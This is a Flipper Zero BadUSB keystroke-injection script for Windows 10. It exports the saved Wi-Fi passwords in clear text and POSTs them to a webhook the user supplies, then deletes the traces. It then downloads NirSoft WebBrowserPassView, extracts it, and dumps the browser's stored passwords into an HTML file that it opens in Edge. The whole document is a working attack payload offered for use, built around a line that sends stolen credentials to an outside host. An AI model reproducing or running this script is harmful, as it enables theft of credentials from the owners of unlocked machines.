REM Polish made the WIFI part I got the passwords part from https://github.com/UberGuidoZ/Flipper/blob/main/BadUSB/Show_Saved_Passwords.txt
REM Big Credit to UberGuidoZ
REM Target Win 10
REM Sending WIFI Passwords through a webhook
REM Replace <your_webhook_here> with your webhook like https://webhook.site/4f8b246c-2071-49c5-baa6-07983dffc024
GUI r
DELAY 500
STRING CMD
ENTER
DELAY 500
STRING cd %temp%
ENTER
DELAY 300
STRING netsh wlan export profile key=clear
ENTER
DELAY 500
STRING powershell Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS
ENTER
DELAY 500
STRING powershell Invoke-WebRequest -Uri <your_webhook_here> -Method POST -InFile Wi-Fi-PASS
ENTER
DELAY 1000
STRING del Wi-* /s /f /q
ENTER
DELAY 500
STRING exit
ENTER
DELAY 1000
GUI r
ENTER
DELAY 500
STRING notepad
ENTER
DELAY 500
STRING I'm Sorry my Kind Sir, I did steal your wifi Passwords.
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 1000
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip ; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e wbpv.zip
ENTER
DELAY 5000
STRING wbpv28821@
ENTER
STRING .\WebBrowserPassView.exe
ENTER
DELAY 3000
CTRL A
CTRL S
DELAY 1000
STRING export.html
TAB
STRING h
ENTER
DELAY 1000
ALT F4
DELAY 1000
STRING Start-Process msedge.exe 'file:///C:/temp/export.htm --inprivate'
ENTER
DELAY 2000
ALT TAB
DELAY 1000
STRING cd \
ENTER
STRING rmdir -R \temp
ENTER
STRING EXIT
ENTER
